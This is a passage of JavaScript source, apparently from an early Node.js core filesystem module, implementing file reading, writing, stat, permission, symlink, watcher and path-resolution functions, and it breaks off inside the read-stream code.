    var backtrace = new Error;
    return function(err) {
      if (err) {
        backtrace.stack = err.name + ': ' + err.message +
                          backtrace.stack.substr(backtrace.name.length);
        err = backtrace;
        throw err;
      }
    };
  }

  return function(err) {
    if (err) {
      throw err;  
    }
  };
}

function maybeCallback(cb) {
  return util.isFunction(cb) ? cb : rethrow();
}




function makeCallback(cb) {
  if (!util.isFunction(cb)) {
    return rethrow();
  }

  return function() {
    return cb.apply(null, arguments);
  };
}

function assertEncoding(encoding) {
  if (encoding && !Buffer.isEncoding(encoding)) {
    throw new Error('Unknown encoding: ' + encoding);
  }
}

function nullCheck(path, callback) {
  if (('' + path).indexOf('\u0000') !== -1) {
    var er = new Error('Path must be a string without null bytes.');
    if (!callback)
      throw er;
    process.nextTick(function() {
      callback(er);
    });
    return false;
  }
  return true;
}


fs.Stats = function(
    dev,
    mode,
    nlink,
    uid,
    gid,
    rdev,
    blksize,
    ino,
    size,
    blocks,
    atim_msec,
    mtim_msec,
    ctim_msec,
    birthtim_msec) {
  this.dev = dev;
  this.mode = mode;
  this.nlink = nlink;
  this.uid = uid;
  this.gid = gid;
  this.rdev = rdev;
  this.blksize = blksize;
  this.ino = ino;
  this.size = size;
  this.blocks = blocks;
  this.atime = new Date(atim_msec);
  this.mtime = new Date(mtim_msec);
  this.ctime = new Date(ctim_msec);
  this.birthtime = new Date(birthtim_msec);
};


binding.FSInitialize(fs.Stats);

fs.Stats.prototype._checkModeProperty = function(property) {
  return ((this.mode & constants.S_IFMT) === property);
};

fs.Stats.prototype.isDirectory = function() {
  return this._checkModeProperty(constants.S_IFDIR);
};

fs.Stats.prototype.isFile = function() {
  return this._checkModeProperty(constants.S_IFREG);
};

fs.Stats.prototype.isBlockDevice = function() {
  return this._checkModeProperty(constants.S_IFBLK);
};

fs.Stats.prototype.isCharacterDevice = function() {
  return this._checkModeProperty(constants.S_IFCHR);
};

fs.Stats.prototype.isSymbolicLink = function() {
  return this._checkModeProperty(constants.S_IFLNK);
};

fs.Stats.prototype.isFIFO = function() {
  return this._checkModeProperty(constants.S_IFIFO);
};

fs.Stats.prototype.isSocket = function() {
  return this._checkModeProperty(constants.S_IFSOCK);
};

fs.exists = function(path, callback) {
  if (!nullCheck(path, cb)) return;
  binding.stat(pathModule._makeLong(path), cb);
  function cb(err, stats) {
    if (callback) callback(err ? false : true);
  }
};

fs.existsSync = function(path) {
  try {
    nullCheck(path);
    binding.stat(pathModule._makeLong(path));
    return true;
  } catch (e) {
    return false;
  }
};

fs.readFile = function(path, options, callback_) {
  var callback = maybeCallback(arguments[arguments.length - 1]);

  if (util.isFunction(options) || !options) {
    options = { encoding: null, flag: 'r' };
  } else if (util.isString(options)) {
    options = { encoding: options, flag: 'r' };
  } else if (!util.isObject(options)) {
    throw new TypeError('Bad arguments');
  }

  var encoding = options.encoding;
  assertEncoding(encoding);

  
  var size;
  var buffer; 
  var buffers; 
  var pos = 0;
  var fd;

  var flag = options.flag || 'r';
  fs.open(path, flag, 438 , function(er, fd_) {
    if (er) return callback(er);
    fd = fd_;

    fs.fstat(fd, function(er, st) {
      if (er) {
        return fs.close(fd, function() {
          callback(er);
        });
      }

      size = st.size;
      if (size === 0) {
        
        
        buffers = [];
        return read();
      }

      if (size > kMaxLength) {
        var err = new RangeError('File size is greater than possible Buffer: ' +
            '0x3FFFFFFF bytes');
        return fs.close(fd, function() {
          callback(err);
        });
      }
      buffer = new Buffer(size);
      read();
    });
  });

  function read() {
    if (size === 0) {
      buffer = new Buffer(8192);
      fs.read(fd, buffer, 0, 8192, -1, afterRead);
    } else {
      fs.read(fd, buffer, pos, size - pos, -1, afterRead);
    }
  }

  function afterRead(er, bytesRead) {
    if (er) {
      return fs.close(fd, function(er2) {
        return callback(er);
      });
    }

    if (bytesRead === 0) {
      return close();
    }

    pos += bytesRead;
    if (size !== 0) {
      if (pos === size) close();
      else read();
    } else {
      
      buffers.push(buffer.slice(0, bytesRead));
      read();
    }
  }

  function close() {
    fs.close(fd, function(er) {
      if (size === 0) {
        
        buffer = Buffer.concat(buffers, pos);
      } else if (pos < size) {
        buffer = buffer.slice(0, pos);
      }

      if (encoding) buffer = buffer.toString(encoding);
      return callback(er, buffer);
    });
  }
};

fs.readFileSync = function(path, options) {
  if (!options) {
    options = { encoding: null, flag: 'r' };
  } else if (util.isString(options)) {
    options = { encoding: options, flag: 'r' };
  } else if (!util.isObject(options)) {
    throw new TypeError('Bad arguments');
  }

  var encoding = options.encoding;
  assertEncoding(encoding);

  var flag = options.flag || 'r';
  var fd = fs.openSync(path, flag, 438 );

  var size;
  var threw = true;
  try {
    size = fs.fstatSync(fd).size;
    threw = false;
  } finally {
    if (threw) fs.closeSync(fd);
  }

  var pos = 0;
  var buffer; 
  var buffers; 

  if (size === 0) {
    buffers = [];
  } else {
    var threw = true;
    try {
      buffer = new Buffer(size);
      threw = false;
    } finally {
      if (threw) fs.closeSync(fd);
    }
  }

  var done = false;
  while (!done) {
    var threw = true;
    try {
      if (size !== 0) {
        var bytesRead = fs.readSync(fd, buffer, pos, size - pos);
      } else {
        
        
        buffer = new Buffer(8192);
        var bytesRead = fs.readSync(fd, buffer, 0, 8192);
        if (bytesRead) {
          buffers.push(buffer.slice(0, bytesRead));
        }
      }
      threw = false;
    } finally {
      if (threw) fs.closeSync(fd);
    }

    pos += bytesRead;
    done = (bytesRead === 0) || (size !== 0 && pos >= size);
  }

  fs.closeSync(fd);

  if (size === 0) {
    
    buffer = Buffer.concat(buffers, pos);
  } else if (pos < size) {
    buffer = buffer.slice(0, pos);
  }

  if (encoding) buffer = buffer.toString(encoding);
  return buffer;
};



function stringToFlags(flag) {
  
  if (!util.isString(flag)) {
    return flag;
  }

  switch (flag) {
    case 'r' : return O_RDONLY;
    case 'rs' : 
    case 'sr' : return O_RDONLY | O_SYNC;
    case 'r+' : return O_RDWR;
    case 'rs+' : 
    case 'sr+' : return O_RDWR | O_SYNC;

    case 'w' : return O_TRUNC | O_CREAT | O_WRONLY;
    case 'wx' : 
    case 'xw' : return O_TRUNC | O_CREAT | O_WRONLY | O_EXCL;

    case 'w+' : return O_TRUNC | O_CREAT | O_RDWR;
    case 'wx+': 
    case 'xw+': return O_TRUNC | O_CREAT | O_RDWR | O_EXCL;

    case 'a' : return O_APPEND | O_CREAT | O_WRONLY;
    case 'ax' : 
    case 'xa' : return O_APPEND | O_CREAT | O_WRONLY | O_EXCL;

    case 'a+' : return O_APPEND | O_CREAT | O_RDWR;
    case 'ax+': 
    case 'xa+': return O_APPEND | O_CREAT | O_RDWR | O_EXCL;
  }

  throw new Error('Unknown file open flag: ' + flag);
}


Object.defineProperty(exports, '_stringToFlags', {
  enumerable: false,
  value: stringToFlags
});





fs.close = function(fd, callback) {
  binding.close(fd, makeCallback(callback));
};

fs.closeSync = function(fd) {
  return binding.close(fd);
};

function modeNum(m, def) {
  if (util.isNumber(m))
    return m;
  if (util.isString(m))
    return parseInt(m, 8);
  if (def)
    return modeNum(def);
  return undefined;
}

fs.open = function(path, flags, mode, callback) {
  callback = makeCallback(arguments[arguments.length - 1]);
  mode = modeNum(mode, 438 );

  if (!nullCheck(path, callback)) return;
  binding.open(pathModule._makeLong(path),
               stringToFlags(flags),
               mode,
               callback);
};

fs.openSync = function(path, flags, mode) {
  mode = modeNum(mode, 438 );
  nullCheck(path);
  return binding.open(pathModule._makeLong(path), stringToFlags(flags), mode);
};

fs.read = function(fd, buffer, offset, length, position, callback) {
  if (!util.isBuffer(buffer)) {
    
    var cb = arguments[4],
        encoding = arguments[3];

    assertEncoding(encoding);

    position = arguments[2];
    length = arguments[1];
    buffer = new Buffer(length);
    offset = 0;

    callback = function(err, bytesRead) {
      if (!cb) return;

      var str = (bytesRead > 0) ? buffer.toString(encoding, 0, bytesRead) : '';

      (cb)(err, str, bytesRead);
    };
  }

  function wrapper(err, bytesRead) {
    
    callback && callback(err, bytesRead || 0, buffer);
  }

  binding.read(fd, buffer, offset, length, position, wrapper);
};

fs.readSync = function(fd, buffer, offset, length, position) {
  var legacy = false;
  if (!util.isBuffer(buffer)) {
    
    legacy = true;
    var encoding = arguments[3];

    assertEncoding(encoding);

    position = arguments[2];
    length = arguments[1];
    buffer = new Buffer(length);

    offset = 0;
  }

  var r = binding.read(fd, buffer, offset, length, position);
  if (!legacy) {
    return r;
  }

  var str = (r > 0) ? buffer.toString(encoding, 0, r) : '';
  return [str, r];
};





fs.write = function(fd, buffer, offset, length, position, callback) {
  if (util.isBuffer(buffer)) {
    
    if (util.isFunction(position)) {
      callback = position;
      position = null;
    }
    callback = maybeCallback(callback);
    var wrapper = function(err, written) {
      
      callback(err, written || 0, buffer);
    };
    return binding.writeBuffer(fd, buffer, offset, length, position, wrapper);
  }

  if (util.isString(buffer))
    buffer += '';
  if (!util.isFunction(position)) {
    if (util.isFunction(offset)) {
      position = offset;
      offset = null;
    } else {
      position = length;
    }
    length = 'utf8';
  }
  callback = maybeCallback(position);
  position = function(err, written) {
    
    callback(err, written || 0, buffer);
  };
  return binding.writeString(fd, buffer, offset, length, position);
};





fs.writeSync = function(fd, buffer, offset, length, position) {
  if (util.isBuffer(buffer)) {
    if (util.isUndefined(position))
      position = null;
    return binding.writeBuffer(fd, buffer, offset, length, position);
  }
  if (!util.isString(buffer))
    buffer += '';
  if (util.isUndefined(offset))
    offset = null;
  return binding.writeString(fd, buffer, offset, length, position);
};

fs.rename = function(oldPath, newPath, callback) {
  callback = makeCallback(callback);
  if (!nullCheck(oldPath, callback)) return;
  if (!nullCheck(newPath, callback)) return;
  binding.rename(pathModule._makeLong(oldPath),
                 pathModule._makeLong(newPath),
                 callback);
};

fs.renameSync = function(oldPath, newPath) {
  nullCheck(oldPath);
  nullCheck(newPath);
  return binding.rename(pathModule._makeLong(oldPath),
                        pathModule._makeLong(newPath));
};

fs.truncate = function(path, len, callback) {
  if (util.isNumber(path)) {
    
    return fs.ftruncate(path, len, callback);
  }
  if (util.isFunction(len)) {
    callback = len;
    len = 0;
  } else if (util.isUndefined(len)) {
    len = 0;
  }
  callback = maybeCallback(callback);
  fs.open(path, 'r+', function(er, fd) {
    if (er) return callback(er);
    binding.ftruncate(fd, len, function(er) {
      fs.close(fd, function(er2) {
        callback(er || er2);
      });
    });
  });
};

fs.truncateSync = function(path, len) {
  if (util.isNumber(path)) {
    
    return fs.ftruncateSync(path, len);
  }
  if (util.isUndefined(len)) {
    len = 0;
  }
  
  var fd = fs.openSync(path, 'r+');
  try {
    var ret = fs.ftruncateSync(fd, len);
  } finally {
    fs.closeSync(fd);
  }
  return ret;
};

fs.ftruncate = function(fd, len, callback) {
  if (util.isFunction(len)) {
    callback = len;
    len = 0;
  } else if (util.isUndefined(len)) {
    len = 0;
  }
  binding.ftruncate(fd, len, makeCallback(callback));
};

fs.ftruncateSync = function(fd, len) {
  if (util.isUndefined(len)) {
    len = 0;
  }
  return binding.ftruncate(fd, len);
};

fs.rmdir = function(path, callback) {
  callback = makeCallback(callback);
  if (!nullCheck(path, callback)) return;
  binding.rmdir(pathModule._makeLong(path), callback);
};

fs.rmdirSync = function(path) {
  nullCheck(path);
  return binding.rmdir(pathModule._makeLong(path));
};

fs.fdatasync = function(fd, callback) {
  binding.fdatasync(fd, makeCallback(callback));
};

fs.fdatasyncSync = function(fd) {
  return binding.fdatasync(fd);
};

fs.fsync = function(fd, callback) {
  binding.fsync(fd, makeCallback(callback));
};

fs.fsyncSync = function(fd) {
  return binding.fsync(fd);
};

fs.mkdir = function(path, mode, callback) {
  if (util.isFunction(mode)) callback = mode;
  callback = makeCallback(callback);
  if (!nullCheck(path, callback)) return;
  binding.mkdir(pathModule._makeLong(path),
                modeNum(mode, 511 ),
                callback);
};

fs.mkdirSync = function(path, mode) {
  nullCheck(path);
  return binding.mkdir(pathModule._makeLong(path),
                       modeNum(mode, 511 ));
};

fs.readdir = function(path, callback) {
  callback = makeCallback(callback);
  if (!nullCheck(path, callback)) return;
  binding.readdir(pathModule._makeLong(path), callback);
};

fs.readdirSync = function(path) {
  nullCheck(path);
  return binding.readdir(pathModule._makeLong(path));
};

fs.fstat = function(fd, callback) {
  binding.fstat(fd, makeCallback(callback));
};

fs.lstat = function(path, callback) {
  callback = makeCallback(callback);
  if (!nullCheck(path, callback)) return;
  binding.lstat(pathModule._makeLong(path), callback);
};

fs.stat = function(path, callback) {
  callback = makeCallback(callback);
  if (!nullCheck(path, callback)) return;
  binding.stat(pathModule._makeLong(path), callback);
};

fs.fstatSync = function(fd) {
  return binding.fstat(fd);
};

fs.lstatSync = function(path) {
  nullCheck(path);
  return binding.lstat(pathModule._makeLong(path));
};

fs.statSync = function(path) {
  nullCheck(path);
  return binding.stat(pathModule._makeLong(path));
};

fs.readlink = function(path, callback) {
  callback = makeCallback(callback);
  if (!nullCheck(path, callback)) return;
  binding.readlink(pathModule._makeLong(path), callback);
};

fs.readlinkSync = function(path) {
  nullCheck(path);
  return binding.readlink(pathModule._makeLong(path));
};

function preprocessSymlinkDestination(path, type) {
  if (!isWindows) {
    
    return path;
  } else if (type === 'junction') {
    
    return pathModule._makeLong(path);
  } else {
    
    return ('' + path).replace(/\//g, '\\');
  }
}

fs.symlink = function(destination, path, type_, callback) {
  var type = (util.isString(type_) ? type_ : null);
  var callback = makeCallback(arguments[arguments.length - 1]);

  if (!nullCheck(destination, callback)) return;
  if (!nullCheck(path, callback)) return;

  binding.symlink(preprocessSymlinkDestination(destination, type),
                  pathModule._makeLong(path),
                  type,
                  callback);
};

fs.symlinkSync = function(destination, path, type) {
  type = (util.isString(type) ? type : null);

  nullCheck(destination);
  nullCheck(path);

  return binding.symlink(preprocessSymlinkDestination(destination, type),
                         pathModule._makeLong(path),
                         type);
};

fs.link = function(srcpath, dstpath, callback) {
  callback = makeCallback(callback);
  if (!nullCheck(srcpath, callback)) return;
  if (!nullCheck(dstpath, callback)) return;

  binding.link(pathModule._makeLong(srcpath),
               pathModule._makeLong(dstpath),
               callback);
};

fs.linkSync = function(srcpath, dstpath) {
  nullCheck(srcpath);
  nullCheck(dstpath);
  return binding.link(pathModule._makeLong(srcpath),
                      pathModule._makeLong(dstpath));
};

fs.unlink = function(path, callback) {
  callback = makeCallback(callback);
  if (!nullCheck(path, callback)) return;
  binding.unlink(pathModule._makeLong(path), callback);
};

fs.unlinkSync = function(path) {
  nullCheck(path);
  return binding.unlink(pathModule._makeLong(path));
};

fs.fchmod = function(fd, mode, callback) {
  binding.fchmod(fd, modeNum(mode), makeCallback(callback));
};

fs.fchmodSync = function(fd, mode) {
  return binding.fchmod(fd, modeNum(mode));
};

if (constants.hasOwnProperty('O_SYMLINK')) {
  fs.lchmod = function(path, mode, callback) {
    callback = maybeCallback(callback);
    fs.open(path, constants.O_WRONLY | constants.O_SYMLINK, function(err, fd) {
      if (err) {
        callback(err);
        return;
      }
      
      
      fs.fchmod(fd, mode, function(err) {
        fs.close(fd, function(err2) {
          callback(err || err2);
        });
      });
    });
  };

  fs.lchmodSync = function(path, mode) {
    var fd = fs.openSync(path, constants.O_WRONLY | constants.O_SYMLINK);

    
    
    var err, err2;
    try {
      var ret = fs.fchmodSync(fd, mode);
    } catch (er) {
      err = er;
    }
    try {
      fs.closeSync(fd);
    } catch (er) {
      err2 = er;
    }
    if (err || err2) throw (err || err2);
    return ret;
  };
}


fs.chmod = function(path, mode, callback) {
  callback = makeCallback(callback);
  if (!nullCheck(path, callback)) return;
  binding.chmod(pathModule._makeLong(path),
                modeNum(mode),
                callback);
};

fs.chmodSync = function(path, mode) {
  nullCheck(path);
  return binding.chmod(pathModule._makeLong(path), modeNum(mode));
};

if (constants.hasOwnProperty('O_SYMLINK')) {
  fs.lchown = function(path, uid, gid, callback) {
    callback = maybeCallback(callback);
    fs.open(path, constants.O_WRONLY | constants.O_SYMLINK, function(err, fd) {
      if (err) {
        callback(err);
        return;
      }
      fs.fchown(fd, uid, gid, callback);
    });
  };

  fs.lchownSync = function(path, uid, gid) {
    var fd = fs.openSync(path, constants.O_WRONLY | constants.O_SYMLINK);
    return fs.fchownSync(fd, uid, gid);
  };
}

fs.fchown = function(fd, uid, gid, callback) {
  binding.fchown(fd, uid, gid, makeCallback(callback));
};

fs.fchownSync = function(fd, uid, gid) {
  return binding.fchown(fd, uid, gid);
};

fs.chown = function(path, uid, gid, callback) {
  callback = makeCallback(callback);
  if (!nullCheck(path, callback)) return;
  binding.chown(pathModule._makeLong(path), uid, gid, callback);
};

fs.chownSync = function(path, uid, gid) {
  nullCheck(path);
  return binding.chown(pathModule._makeLong(path), uid, gid);
};


function toUnixTimestamp(time) {
  if (util.isNumber(time)) {
    return time;
  }
  if (util.isDate(time)) {
    
    return time.getTime() / 1000;
  }
  throw new Error('Cannot parse time: ' + time);
}

// exported for unit tests, not for public consumption
fs._toUnixTimestamp = toUnixTimestamp;

fs.utimes = function(path, atime, mtime, callback) {
  callback = makeCallback(callback);
  if (!nullCheck(path, callback)) return;
  binding.utimes(pathModule._makeLong(path),
                 toUnixTimestamp(atime),
                 toUnixTimestamp(mtime),
                 callback);
};

fs.utimesSync = function(path, atime, mtime) {
  nullCheck(path);
  atime = toUnixTimestamp(atime);
  mtime = toUnixTimestamp(mtime);
  binding.utimes(pathModule._makeLong(path), atime, mtime);
};

fs.futimes = function(fd, atime, mtime, callback) {
  atime = toUnixTimestamp(atime);
  mtime = toUnixTimestamp(mtime);
  binding.futimes(fd, atime, mtime, makeCallback(callback));
};

fs.futimesSync = function(fd, atime, mtime) {
  atime = toUnixTimestamp(atime);
  mtime = toUnixTimestamp(mtime);
  binding.futimes(fd, atime, mtime);
};

function writeAll(fd, buffer, offset, length, position, callback) {
  callback = maybeCallback(arguments[arguments.length - 1]);

  // write(fd, buffer, offset, length, position, callback)
  fs.write(fd, buffer, offset, length, position, function(writeErr, written) {
    if (writeErr) {
      fs.close(fd, function() {
        if (callback) callback(writeErr);
      });
    } else {
      if (written === length) {
        fs.close(fd, callback);
      } else {
        offset += written;
        length -= written;
        position += written;
        writeAll(fd, buffer, offset, length, position, callback);
      }
    }
  });
}

fs.writeFile = function(path, data, options, callback) {
  var callback = maybeCallback(arguments[arguments.length - 1]);

  if (util.isFunction(options) || !options) {
    options = { encoding: 'utf8', mode: 438 /*=0666*/, flag: 'w' };
  } else if (util.isString(options)) {
    options = { encoding: options, mode: 438, flag: 'w' };
  } else if (!util.isObject(options)) {
    throw new TypeError('Bad arguments');
  }

  assertEncoding(options.encoding);

  var flag = options.flag || 'w';
  fs.open(path, flag, options.mode, function(openErr, fd) {
    if (openErr) {
      if (callback) callback(openErr);
    } else {
      var buffer = util.isBuffer(data) ? data : new Buffer('' + data,
          options.encoding || 'utf8');
      var position = /a/.test(flag) ? null : 0;
      writeAll(fd, buffer, 0, buffer.length, position, callback);
    }
  });
};

fs.writeFileSync = function(path, data, options) {
  if (!options) {
    options = { encoding: 'utf8', mode: 438 /*=0666*/, flag: 'w' };
  } else if (util.isString(options)) {
    options = { encoding: options, mode: 438, flag: 'w' };
  } else if (!util.isObject(options)) {
    throw new TypeError('Bad arguments');
  }

  assertEncoding(options.encoding);

  var flag = options.flag || 'w';
  var fd = fs.openSync(path, flag, options.mode);
  if (!util.isBuffer(data)) {
    data = new Buffer('' + data, options.encoding || 'utf8');
  }
  var written = 0;
  var length = data.length;
  var position = /a/.test(flag) ? null : 0;
  try {
    while (written < length) {
      written += fs.writeSync(fd, data, written, length - written, position);
      position += written;
    }
  } finally {
    fs.closeSync(fd);
  }
};

fs.appendFile = function(path, data, options, callback_) {
  var callback = maybeCallback(arguments[arguments.length - 1]);

  if (util.isFunction(options) || !options) {
    options = { encoding: 'utf8', mode: 438 /*=0666*/, flag: 'a' };
  } else if (util.isString(options)) {
    options = { encoding: options, mode: 438, flag: 'a' };
  } else if (!util.isObject(options)) {
    throw new TypeError('Bad arguments');
  }

  if (!options.flag)
    options = util._extend({ flag: 'a' }, options);
  fs.writeFile(path, data, options, callback);
};

fs.appendFileSync = function(path, data, options) {
  if (!options) {
    options = { encoding: 'utf8', mode: 438 /*=0666*/, flag: 'a' };
  } else if (util.isString(options)) {
    options = { encoding: options, mode: 438, flag: 'a' };
  } else if (!util.isObject(options)) {
    throw new TypeError('Bad arguments');
  }
  if (!options.flag)
    options = util._extend({ flag: 'a' }, options);

  fs.writeFileSync(path, data, options);
};

function FSWatcher() {
  EventEmitter.call(this);

  var self = this;
  var FSEvent = process.binding('fs_event_wrap').FSEvent;
  this._handle = new FSEvent();
  this._handle.owner = this;

  this._handle.onchange = function(status, event, filename) {
    if (status < 0) {
      self._handle.close();
      self.emit('error', errnoException(status, 'watch'));
    } else {
      self.emit('change', event, filename);
    }
  };
}
util.inherits(FSWatcher, EventEmitter);

FSWatcher.prototype.start = function(filename, persistent, recursive) {
  nullCheck(filename);
  var err = this._handle.start(pathModule._makeLong(filename),
                               persistent,
                               recursive);
  if (err) {
    this._handle.close();
    throw errnoException(err, 'watch');
  }
};

FSWatcher.prototype.close = function() {
  this._handle.close();
};

fs.watch = function(filename) {
  nullCheck(filename);
  var watcher;
  var options;
  var listener;

  if (util.isObject(arguments[1])) {
    options = arguments[1];
    listener = arguments[2];
  } else {
    options = {};
    listener = arguments[1];
  }

  if (util.isUndefined(options.persistent)) options.persistent = true;
  if (util.isUndefined(options.recursive)) options.recursive = false;

  watcher = new FSWatcher();
  watcher.start(filename, options.persistent, options.recursive);

  if (listener) {
    watcher.addListener('change', listener);
  }

  return watcher;
};


// Stat Change Watchers

function StatWatcher() {
  EventEmitter.call(this);

  var self = this;
  this._handle = new binding.StatWatcher();

  // uv_fs_poll is a little more powerful than ev_stat but we curb it for
  // the sake of backwards compatibility
  var oldStatus = -1;

  this._handle.onchange = function(current, previous, newStatus) {
    if (oldStatus === -1 &&
        newStatus === -1 &&
        current.nlink === previous.nlink) return;

    oldStatus = newStatus;
    self.emit('change', current, previous);
  };

  this._handle.onstop = function() {
    self.emit('stop');
  };
}
util.inherits(StatWatcher, EventEmitter);


StatWatcher.prototype.start = function(filename, persistent, interval) {
  nullCheck(filename);
  this._handle.start(pathModule._makeLong(filename), persistent, interval);
};


StatWatcher.prototype.stop = function() {
  this._handle.stop();
};


var statWatchers = {};
function inStatWatchers(filename) {
  return Object.prototype.hasOwnProperty.call(statWatchers, filename) &&
      statWatchers[filename];
}


fs.watchFile = function(filename) {
  nullCheck(filename);
  filename = pathModule.resolve(filename);
  var stat;
  var listener;

  var options = {
    // Poll interval in milliseconds. 5007 is what libev used to use. It's
    // a little on the slow side but let's stick with it for now to keep
    // behavioral changes to a minimum.
    interval: 5007,
    persistent: true
  };

  if (util.isObject(arguments[1])) {
    options = util._extend(options, arguments[1]);
    listener = arguments[2];
  } else {
    listener = arguments[1];
  }

  if (!listener) {
    throw new Error('watchFile requires a listener function');
  }

  if (inStatWatchers(filename)) {
    stat = statWatchers[filename];
  } else {
    stat = statWatchers[filename] = new StatWatcher();
    stat.start(filename, options.persistent, options.interval);
  }
  stat.addListener('change', listener);
  return stat;
};

fs.unwatchFile = function(filename, listener) {
  nullCheck(filename);
  filename = pathModule.resolve(filename);
  if (!inStatWatchers(filename)) return;

  var stat = statWatchers[filename];

  if (util.isFunction(listener)) {
    stat.removeListener('change', listener);
  } else {
    stat.removeAllListeners('change');
  }

  if (EventEmitter.listenerCount(stat, 'change') === 0) {
    stat.stop();
    statWatchers[filename] = undefined;
  }
};

// Regexp that finds the next partion of a (partial) path
// result is [base_with_slash, base], e.g. ['somedir/', 'somedir']
if (isWindows) {
  var nextPartRe = /(.*?)(?:[\/\\]+|$)/g;
} else {
  var nextPartRe = /(.*?)(?:[\/]+|$)/g;
}

// Regex to find the device root, including trailing slash. E.g. 'c:\\'.
if (isWindows) {
  var splitRootRe = /^(?:[a-zA-Z]:|[\\\/]{2}[^\\\/]+[\\\/][^\\\/]+)?[\\\/]*/;
} else {
  var splitRootRe = /^[\/]*/;
}

fs.realpathSync = function realpathSync(p, cache) {
  // make p is absolute
  p = pathModule.resolve(p);

  if (cache && Object.prototype.hasOwnProperty.call(cache, p)) {
    return cache[p];
  }

  var original = p,
      seenLinks = {},
      knownHard = {};

  // current character position in p
  var pos;
  // the partial path so far, including a trailing slash if any
  var current;
  // the partial path without a trailing slash (except when pointing at a root)
  var base;
  // the partial path scanned in the previous round, with slash
  var previous;

  start();

  function start() {
    // Skip over roots
    var m = splitRootRe.exec(p);
    pos = m[0].length;
    current = m[0];
    base = m[0];
    previous = '';

    // On windows, check that the root exists. On unix there is no need.
    if (isWindows && !knownHard[base]) {
      fs.lstatSync(base);
      knownHard[base] = true;
    }
  }

  // walk down the path, swapping out linked pathparts for their real
  // values
  // NB: p.length changes.
  while (pos < p.length) {
    // find the next part
    nextPartRe.lastIndex = pos;
    var result = nextPartRe.exec(p);
    previous = current;
    current += result[0];
    base = previous + result[1];
    pos = nextPartRe.lastIndex;

    // continue if not a symlink
    if (knownHard[base] || (cache && cache[base] === base)) {
      continue;
    }

    var resolvedLink;
    if (cache && Object.prototype.hasOwnProperty.call(cache, base)) {
      // some known symbolic link.  no need to stat again.
      resolvedLink = cache[base];
    } else {
      var stat = fs.lstatSync(base);
      if (!stat.isSymbolicLink()) {
        knownHard[base] = true;
        if (cache) cache[base] = base;
        continue;
      }

      // read the link if it wasn't read before
      
      var linkTarget = null;
      if (!isWindows) {
        var id = stat.dev.toString(32) + ':' + stat.ino.toString(32);
        if (seenLinks.hasOwnProperty(id)) {
          linkTarget = seenLinks[id];
        }
      }
      if (util.isNull(linkTarget)) {
        fs.statSync(base);
        linkTarget = fs.readlinkSync(base);
      }
      resolvedLink = pathModule.resolve(previous, linkTarget);
      
      if (cache) cache[base] = resolvedLink;
      if (!isWindows) seenLinks[id] = linkTarget;
    }

    
    p = pathModule.resolve(resolvedLink, p.slice(pos));
    start();
  }

  if (cache) cache[original] = p;

  return p;
};


fs.realpath = function realpath(p, cache, cb) {
  if (!util.isFunction(cb)) {
    cb = maybeCallback(cache);
    cache = null;
  }

  
  p = pathModule.resolve(p);

  if (cache && Object.prototype.hasOwnProperty.call(cache, p)) {
    return process.nextTick(cb.bind(null, null, cache[p]));
  }

  var original = p,
      seenLinks = {},
      knownHard = {};

  
  var pos;
  
  var current;
  
  var base;
  
  var previous;

  start();

  function start() {
    
    var m = splitRootRe.exec(p);
    pos = m[0].length;
    current = m[0];
    base = m[0];
    previous = '';

    
    if (isWindows && !knownHard[base]) {
      fs.lstat(base, function(err) {
        if (err) return cb(err);
        knownHard[base] = true;
        LOOP();
      });
    } else {
      process.nextTick(LOOP);
    }
  }

  
  
  function LOOP() {
    
    if (pos >= p.length) {
      if (cache) cache[original] = p;
      return cb(null, p);
    }

    
    nextPartRe.lastIndex = pos;
    var result = nextPartRe.exec(p);
    previous = current;
    current += result[0];
    base = previous + result[1];
    pos = nextPartRe.lastIndex;

    
    if (knownHard[base] || (cache && cache[base] === base)) {
      return process.nextTick(LOOP);
    }

    if (cache && Object.prototype.hasOwnProperty.call(cache, base)) {
      
      return gotResolvedLink(cache[base]);
    }

    return fs.lstat(base, gotStat);
  }

  function gotStat(err, stat) {
    if (err) return cb(err);

    
    if (!stat.isSymbolicLink()) {
      knownHard[base] = true;
      if (cache) cache[base] = base;
      return process.nextTick(LOOP);
    }

    
    
    
    if (!isWindows) {
      var id = stat.dev.toString(32) + ':' + stat.ino.toString(32);
      if (seenLinks.hasOwnProperty(id)) {
        return gotTarget(null, seenLinks[id], base);
      }
    }
    fs.stat(base, function(err) {
      if (err) return cb(err);

      fs.readlink(base, function(err, target) {
        if (!isWindows) seenLinks[id] = target;
        gotTarget(err, target);
      });
    });
  }

  function gotTarget(err, target, base) {
    if (err) return cb(err);

    var resolvedLink = pathModule.resolve(previous, target);
    if (cache) cache[base] = resolvedLink;
    gotResolvedLink(resolvedLink);
  }

  function gotResolvedLink(resolvedLink) {
    
    p = pathModule.resolve(resolvedLink, p.slice(pos));
    start();
  }
};



var pool;

function allocNewPool(poolSize) {
  pool = new Buffer(poolSize);
  pool.used = 0;
}



fs.createReadStream = function(path, options) {
  return new ReadStream(path, options);
};

util.inherits(ReadStream, Readable);
fs.ReadStream = ReadStream;

function ReadStream(path, options) {
  if (!(this instanceof ReadStream))
    return new ReadStream(path, options);

  
  options = util._extend({
    highWaterMark: 64 * 1024
  }, options || {});

  Readable.call(this, options);

  this.path = path;
  this.fd = options.hasOwnProperty('fd') ? options.fd : null;
  this.flags = options.hasOwnProperty('flags') ? options.flags : 'r';
  this.mode = options.hasOwnProperty('mode') ? options.mode : 438; 

  this.start = options.hasOwnProperty('start') ? options.start : undefined;
  this.end = options.hasOwnProperty('end') ? options.end : undefined;
  this.autoClose = options.hasOwnProperty('autoClose') ?
      options.autoClose : true;
  this.pos = undefined;

  if (!util.isUndefined(this.start)) {
    if (!util.isNumber(this.start)) {
      throw TypeError('start must be a Number');
    }
    if (util.isUndefined(this.end)) {
      this.end = Infinity;
    } else if (!util.isNumber(this.end)) {
      throw TypeError('end must be a Number');
    }

    if (this.start > this.end) {
      throw new Error('start must be <= end');
    }

    this.pos = this.start;
  }

  if (!util.isNumber(this.fd))
    this.open();

  this.on('end', function() {
    if (this.autoClose) {
      this.destroy();
    }
  });
}

fs.FileReadStream = fs.ReadStream; 

ReadStream.prototype.open = function() {
  var self = this;
  fs.open(this.path, this.flags, this.mode, function(er, fd) {
    if (er) {
      if (self.autoClose) {
        self.destroy();
      }
      self.emit('error', er);
      return;
    }

    self.fd = fd;
    self.emit('open', fd);
    
    self.read();
  });
};

ReadStream.prototype._read = function(n) {
  if (!util.isNumber(this.fd))
    return this.once('open', function() {
      this._read(n);
    });

  if (this.destroyed)
    return;

  if (!pool || pool.length - pool.used < kMinPoolSpace) {
    
    pool = null;
    allocNewPool(this._readableState.highWaterMark);
